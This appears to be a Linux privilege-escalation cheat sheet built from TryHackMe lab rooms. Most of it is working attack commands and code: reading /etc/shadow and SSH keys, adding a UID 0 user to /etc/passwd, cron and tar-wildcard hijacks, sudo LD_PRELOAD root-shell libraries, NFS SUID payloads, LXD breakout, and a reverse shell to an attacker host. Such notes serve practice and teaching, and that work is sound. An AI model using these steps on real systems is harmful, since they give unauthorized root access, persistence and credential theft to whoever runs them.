Linux

Gathering Info

whoami
id
groups
cat ~/.bash_history
uname -a

Check for passwords in environment variables

env

Find files

Files owned by your user

Victim

find / -user $USER 2>/dev/null

Files owned by group

Victim

find / -type f -group $GROUP 2>/dev/null

Find passwords

cat /etc/passwd
cat /etc/shadow
cat /var/www/html/wp-config.php #WordPress sites (database credentials)
cat /home/user/myvpn.ovpn #VPN. Look for auth-user-pass and read the file it points to.
find / -type f -name "*.bak" 2>/dev/null 
#Find files and exclude paths to reduce results
find / \( -path /lib -o -path /snap -o -path /etc/sane.d -o -path /etc/fonts -o -path /usr/share -o -path /etc/apache2 \) -prune -o -name "*.conf" -print 2>/dev/null

Victim

cat ~/.bash_history | grep -i passw 

SSH Keys
find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsa

Weak File Permissions

Readable /etc/shadow

Weak File Permissions - Readable /etc/shadow

Writable /etc/shadow

Weak File Permissions - Writable /etc/shadow

Writable /etc/passwd

Weak File Permissions - Writable /etc/passwd
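The three weak-permission cases above, as an added example that is not part of the original page or the room it links to: it reports which condition holds for a given passwd/shadow pair, merges the two files the way unshadow does so the hashes can be fed to john (readable /etc/shadow), and builds the UID 0 line you would append to a writable /etc/passwd. The functions take file paths so they can be tried on scratch copies; the sample passwd and shadow contents are constructed, and openssl and awk are assumed to be present.

```shell
#!/bin/bash
# Added example, not from the original page. All functions take the passwd and
# shadow paths as arguments so they can be run against scratch copies first.

# Report which of the three weak-permission conditions hold.
check_perms() {
  local passwd="$1" shadow="$2"
  [ -r "$shadow" ] && echo "readable-shadow"
  [ -w "$shadow" ] && echo "writable-shadow"
  [ -w "$passwd" ] && echo "writable-passwd"
  return 0
}

# Readable /etc/shadow: put each user's real hash into the passwd line
# (what `unshadow /etc/passwd /etc/shadow` does), skipping locked accounts.
merge_for_cracking() {
  local passwd="$1" shadow="$2"
  awk -F: 'NR==FNR { h[$1]=$2; next }
           ($1 in h) && h[$1] !~ /^[*!]/ { $2=h[$1]; print }' OFS=: "$shadow" "$passwd"
}

# Writable /etc/passwd: a new UID 0 user with a known password. The SHA-512
# crypt hash goes straight into field 2; the shadow file is only consulted
# when that field is "x", so this line logs in with the given password.
make_root_entry() {
  local user="$1" pass="$2" hash
  hash=$(openssl passwd -6 -salt "saltsalt" "$pass") || return 1
  printf '%s:%s:0:0:root:/root:/bin/bash\n' "$user" "$hash"
}

demo() {
  local d; d=$(mktemp -d) || return 1
  # Constructed sample files standing in for /etc/passwd and /etc/shadow.
  printf 'root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000::/home/user:/bin/bash\nnobody:x:65534:65534::/:/usr/sbin/nologin\n' > "$d/passwd"
  printf 'root:$6$abc$HASH1:18000:0:99999:7:::\nuser:$6$def$HASH2:18000:0:99999:7:::\nnobody:*:18000:0:99999:7:::\n' > "$d/shadow"
  chmod 644 "$d/shadow"   # simulate a world-readable shadow file
  check_perms "$d/passwd" "$d/shadow"
  merge_for_cracking "$d/passwd" "$d/shadow"      # feed this to john/hashcat
  make_root_entry newroot 'Password1' >> "$d/passwd"   # then: su newroot
  tail -n1 "$d/passwd"
  rm -rf "$d"
}
```

On a real target the last step is `make_root_entry newroot 'Password1' >> /etc/passwd` followed by `su newroot`; for a writable /etc/shadow, replace root's hash field with the output of `openssl passwd -6` instead.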

Cron Jobs

Findings & Comments

What to look for:

The job runs a file we have permission to overwrite.

The job does not use an absolute path, so PATH can be changed to point it at a different file.

Victim

cat /etc/crontab

Possible other places crons are running

Victim

cat /etc/cron.d/*

Cron Jobs - File Permissions

Examples

Cron Jobs - File Permissions

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

View the contents of the system-wide crontab.

Victim

cat /etc/crontab

There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.

Locate the full path of the overwrite.sh file.

Victim

locate overwrite.sh

Note that the file is world-writable.

Victim

ls -l /usr/local/bin/overwrite.sh

Cron Jobs - PATH Environment Variable

Examples

Cron Jobs - PATH Environment Variable

View the contents of the system-wide crontab

Victim

cat /etc/crontab

Note that the PATH variable starts with /home/user which is our user's home directory. Create a file called overwrite.sh in your home directory with the following contents

overwrite.sh

#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

Make sure that the file is executable

Victim

chmod +x /home/user/overwrite.sh

Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:

Victim

/tmp/rootbash -p

Cron Jobs - Wildcards

Examples

Cron Jobs - Wildcards

View the contents of the other cron job script

Victim

cat /usr/local/bin/compress.sh

Note that the tar command is being run with a wildcard (*) in your home directory, so the shell expands every file name there into an argument for tar, including file names that look like tar options.
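The wildcard abuse above, as an added example that is not part of the original page: it reproduces the attack in a scratch directory as the current user, so the payload only drops a marker file rather than a SUID shell. The file names are the ones from GTFOBins' tar entry; GNU tar is assumed (it accepts options after operands, which is what makes the expanded file names work).

```shell
#!/bin/bash
# Added example, not from the original page. Same shape as compress.sh: tar is
# handed "*" in a directory whose file names the shell expands into tar options.
demo_tar_wildcard() {
  local work; work=$(mktemp -d) || return 1
  ( cd "$work" || exit 1
    # Payload the root cron job would execute; here it only leaves a marker.
    printf '#!/bin/sh\ntouch "%s/pwned"\n' "$work" > shell.sh
    chmod +x shell.sh
    # File names that tar parses as options once "*" is expanded.
    touch -- '--checkpoint=1' '--checkpoint-action=exec=sh shell.sh'
    echo data > file1.txt
    # What the cron script does: tar cf <archive> *
    tar cf "$work.tar" * >/dev/null 2>&1 ) || true
  if [ -e "$work/pwned" ]; then echo executed; else echo not-executed; fi
  rm -rf "$work" "$work.tar"
}
```

Against the real cron job, shell.sh would instead be `cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash`, and after a minute `/tmp/rootbash -p` gives the root shell.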

Sudo/SUID/Capabilities

Run all of these checks, then look up each binary on https://gtfobins.github.io/ ; the same binary can give different results depending on whether it is reachable through sudo, a SUID bit or a capability.

Check what can be run with NOPASSWD

Victim

sudo -l
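An added example (not from the original page) that pulls the two actionable items out of sudo -l output: the commands runnable with NOPASSWD, which are what you look up on GTFOBins, and the variables listed in env_keep, which decide whether the LD_PRELOAD and LD_LIBRARY_PATH tricks later on this page apply. The sudo -l text used here is a constructed sample in sudo's usual output format.

```shell
#!/bin/bash
# Added example, not from the original page. Usage on a target:
#   sudo -l 2>/dev/null | nopasswd_cmds
#   sudo -l 2>/dev/null | kept_env

# Print each command allowed with NOPASSWD, one per line (sudo lists several
# commands on one line separated by commas).
nopasswd_cmds() {
  sed -n 's/.*NOPASSWD:[[:space:]]*//p' | tr ',' '\n' | sed 's/^[[:space:]]*//'
}

# Print each variable in env_keep, handling both the env_keep+=VAR and the
# env_keep+="VAR1 VAR2" spellings sudo prints.
kept_env() {
  grep -oE 'env_keep\+=("[^"]*"|[^,[:space:]]*)' \
    | sed 's/^env_keep+=//; s/"//g' \
    | tr ' ' '\n'
}

# Constructed sample standing in for real `sudo -l` output.
SAMPLE_SUDO_L='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+="LD_LIBRARY_PATH PYTHONPATH"

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/apache2
    (ALL : ALL) ALL'

demo() {
  echo "== NOPASSWD commands (look each up on GTFOBins) =="
  printf '%s\n' "$SAMPLE_SUDO_L" | nopasswd_cmds
  echo "== environment variables sudo preserves =="
  printf '%s\n' "$SAMPLE_SUDO_L" | kept_env
}
```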

Finding (comment or example room in parentheses):

yum (Privilege Escalation)
anansi_util (Privilege Escalation)
vi (BASH scripts)
chmod
apache2
nmap
ftp
more
less
awk
man
vim
iftop
sudo
pkexec
nano
certutil (Read files)
base64, base32 (Read files)
env
pico
flask
python3
tar
reboot
bash
ALL
fail2ban
exiftool
zip
tee
ko file

SUID / SGID Executables - Known Exploits

Find all the SUID/SGID executables.

Victim

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Finding (comment or example room in parentheses):

base64 (Read files we shouldn't have access to read)
find (Privilege Escalation)
python3

SUID / SGID Executables - Shared Object Injection

SUID / SGID Executables - Shared Object Injection

SUID / SGID Executables - Environment Variables

SUID / SGID Executables - Environment Variables

SUID / SGID Executables - Abusing Shell Features

SUID / SGID Executables - Abusing Shell Features (#1)

SUID / SGID Executables - Abusing Shell Features (#2)

Sudo - Environment Variables

LD_LIBRARY_PATH

Examples

Sudo - Environment Variables

preload.c - code

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_PRELOAD");	/* otherwise the spawned bash would load this object again */
	setresuid(0,0,0);
	system("/bin/bash -p");
}

library_path.c

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");	/* otherwise the spawned bash would pick up the fake library again */
	setresuid(0,0,0);
	system("/bin/bash -p");
}

Sudo can be configured to inherit certain environment variables from the user's environment. Check which environment variables are inherited (look for the env_keep options):

Victim

sudo -l

LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user's environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

Create a shared object using the code located at /home/user/tools/sudo/preload.c.

Victim

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c

Run one of the programs you are allowed to run with sudo (ftp here), setting LD_PRELOAD to the new shared object; because LD_PRELOAD is in env_keep, sudo passes it through to the program:

Victim

sudo LD_PRELOAD=/tmp/preload.so /usr/bin/ftp

A root shell should spawn. Exit out of the shell before continuing. Depending on the program you chose, you may need to exit out of this as well.

Run ldd against the apache2 program file to see which shared libraries are used by the program.

Victim

ldd /usr/sbin/apache2

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c.

Victim

gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c

Run apache2 with sudo, pointing LD_LIBRARY_PATH at /tmp so the loader finds the fake libcrypt.so.1 before the real one:

Victim

sudo LD_LIBRARY_PATH=/tmp apache2

LD_PRELOAD

Examples

Road

If LD_PRELOAD is in env_keep, build the shared object below, then run a command you are allowed to run with NOPASSWD with LD_PRELOAD pointing at it:

Victim

vi preload.c

preload.c - code

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
/* _init runs when the object is loaded; -nostartfiles below keeps the default one out of the way */
void _init() {
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

Victim

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so $NOPASSWD_SCRIPT_WE_CAN_ABUSE

Files with SUID-bit set

Victim

find / -perm -u=s -type f 2> /dev/null 

Finding (comment in parentheses):

setcap (A SUID setcap binary is very interesting, check the room: it can grant capabilities such as cap_setuid to other binaries, which can then escalate; list existing capabilities with getcap.)
Programs in strange locations (If a program is running from a user's home directory or somewhere else unusual, it is worth investigating.)
find (Can spawn shell)
doas (Can read files or copy files)
strings (Can read files)
cputils (Can copy files)
tar (Can spawn shell)
grep (Read files)

Getcap

Victim

getcap -r / 2>/dev/null
Finding (comment in parentheses):

python (If the binary has the Linux CAP_SETUID capability set, or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.)
vim (Can spawn shell)
perl (Can spawn shell)
openssl (Can spawn shell)
ruby
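An added example (not from the original page) that filters getcap -r output down to binaries whose file capabilities can be turned into root, so the interesting lines are not lost among the usual cap_net_raw entries for ping and tcpdump. It handles both output styles libcap has used ("path = caps" and "path caps"); the capability list and the sample output are constructed assumptions, not from the page.

```shell
#!/bin/bash
# Added example, not from the original page. Usage on a target:
#   getcap -r / 2>/dev/null | interesting_caps

# Capabilities that let a binary (or an interpreter such as python/perl) escalate
# on its own: change UID/GID, bypass file permission checks, load modules, etc.
DANGEROUS_CAPS='cap_setuid|cap_setgid|cap_dac_read_search|cap_dac_override|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner|cap_setfcap'

# Print the path of every binary carrying at least one dangerous capability.
# -w matches whole words, so cap_setuid+ep and cap_setuid=ep both match while
# cap_net_raw does not.
interesting_caps() {
  grep -Ew "($DANGEROUS_CAPS)" | awk '{ print $1 }'
}

# Constructed sample standing in for real `getcap -r /` output.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/perl cap_setuid=ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/vim.basic cap_dac_override,cap_setuid=eip'

demo() {
  printf '%s\n' "$SAMPLE_GETCAP" | interesting_caps
}
```

Each hit is then looked up on GTFOBins under "Capabilities"; for the python case that is the cap_setuid backdoor described above.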

Service Exploits

Finding
Comments
Examples

PATH Variables

Examples

Look at the PATH line in the crontab. In the example below it lists /home/lachlan/bin before /bin and /usr/bin, and the job calls pkill without an absolute path, so a file named /home/lachlan/bin/pkill is found first and runs as root with whatever contents we give it.

Victim

cat /etc/crontab

Possible other places crons are running

Victim

cat /etc/cron.d/*

Victim(lachlan)

echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill; chmod +x /home/lachlan/bin/pkill

Add path

Example

If a cron job (or any privileged script) calls a command without its full path, the command is resolved through PATH, so prepending a directory we control redirects it to our own file.

Before changing PATH, ls resolves to /bin/ls.

After running the command below, a file named ls in /tmp is found first and our script runs instead.

Victim

export PATH=/tmp:$PATH
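The PATH redirection above, as an added example that is not part of the original page: it creates a shadowing ls in a scratch directory, prepends that directory to PATH inside a subshell so the caller's environment is untouched, and shows which file the bare name now resolves to. It only affects the current user; the point is that a root cron job with a writable leading PATH entry resolves names the same way.

```shell
#!/bin/bash
# Added example, not from the original page.
path_hijack_demo() {
  local d before after
  d=$(mktemp -d) || return 1
  before=$(command -v ls)
  # Shadowing binary; a real cron payload would copy bash and set the SUID bit.
  printf '#!/bin/sh\necho hijacked\n' > "$d/ls"
  chmod +x "$d/ls"
  # Prepend in a subshell so PATH outside this function is unchanged;
  # hash -r flushes the shell's cache of previously resolved command locations.
  after=$(PATH="$d:$PATH"; hash -r; command -v ls)
  printf 'before: %s\nafter:  %s\n' "$before" "$after"
  rm -rf "$d"
  [ "$after" = "$d/ls" ]
}
```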

Passwords & Keys

History Files

Examples

Passwords & Keys - History Files

Victim

cat ~/.*history | less

Config Files

Examples

Passwords & Keys - Config Files

Victim

cat /home/user/myvpn.ovpn

SSH Keys

Copy keys from Victim

Examples

Passwords & Keys - SSH Keys

Look for SSH keys in users' .ssh directories, and for hidden files and directories in the system root.

Victim

cat /home/$USER/.ssh/$KEY

Copy the key over to your Kali box (it's easier to just view the contents of the $KEY file and copy/paste the key) and give it the correct permissions, otherwise your SSH client will refuse to use it.

Kali

chmod 600 $KEY
ssh -i $KEY -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa $USER@$VICTIM

Add Keys to Victim

Examples

Madeye's Castle

Kali

ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub 

Victim

echo "$YOURKEY" >> /home/$USER/.ssh/authorized_keys

Kali

ssh $USER@$VICTIM

NFS

Examples

NFS / Linux Privilege Escalation / Linux PrivEsc Arena

Option #1

Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.

Check the NFS share configuration on the Debian VM.

Victim

cat /etc/exports

no_root_squash is present

Note that the /tmp share has root squashing disabled.

On your Kali box, switch to your root user if you are not already running as root.

Kali

sudo su

Using Kali's root user, create a mount point on your Kali box and mount the /tmp share (update the IP accordingly).

Kali

mkdir /tmp/nfs
mount -o rw,vers=3 $VICTIM:/tmp /tmp/nfs

Still using Kali's root user, generate a payload using msfvenom and save it to the mounted share (this payload simply runs /bin/bash -p).

Kali

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

Still using Kali's root user, make the file executable and set the SUID permission.

Kali

chmod +xs /tmp/nfs/shell.elf

Back on the Debian VM, as the low privileged user account, execute the file to gain a root shell.

Victim

/tmp/shell.elf

Option #2

Kali

showmount -e $VICTIM

Victim

cat /etc/exports

Kali

mkdir /root/attack
mount -o rw $VICTIM:/home/ubuntu/sharedfolder /root/attack
subl /root/attack/nfc.c

nfc.c

#include <stdlib.h>
#include <unistd.h>

int main()
{ setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

Kali

gcc /root/attack/nfc.c -o /root/attack/nfc -w
chmod +s /root/attack/nfc

Victim

cd /home/ubuntu/sharedfolder
./nfc

Kernel Exploits

Examples

Kernel Exploits

Writable Files

Files where group permissions equal to "writable"

find / -type f -perm /g=w -exec ls -l {} + 2> /dev/null 
find / -writable 2>/dev/null

Ports

May be able to find open ports only accessible internally.

ss -ltp
netstat -tuan

LXD

Examples

AnonymousGamingServer

Resources

https://www.hackingarticles.in/lxd-privilege-escalation/

Victim

id

Kali

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81

Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.

Victim

cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

PolKit

Examples: Hip Flask

See if it exists.

Kali

apt list --upgradeable

Check out this room for more details

Monitor Processes

Examples

Enumeration

Victim

ps axf

PSPY

pspy is a tool that monitors Linux processes (including commands launched by cron) without root access

Kali

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32 
python2 -m SimpleHTTPServer 81

Victim

wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32 

Docker Breakout / Privilege Escalation

Examples

Container Vulnerabilities

UltraTech

dogcat

The Marketplace

Chill Hack

The Docker Rodeo

The Great Escape

Umbrella

Copy Material from here:

https://tryhackme.com/room/linprivesc

Automated Enumeration Tools

Room with other things to try

https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc

Other Cheat sheets

https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics
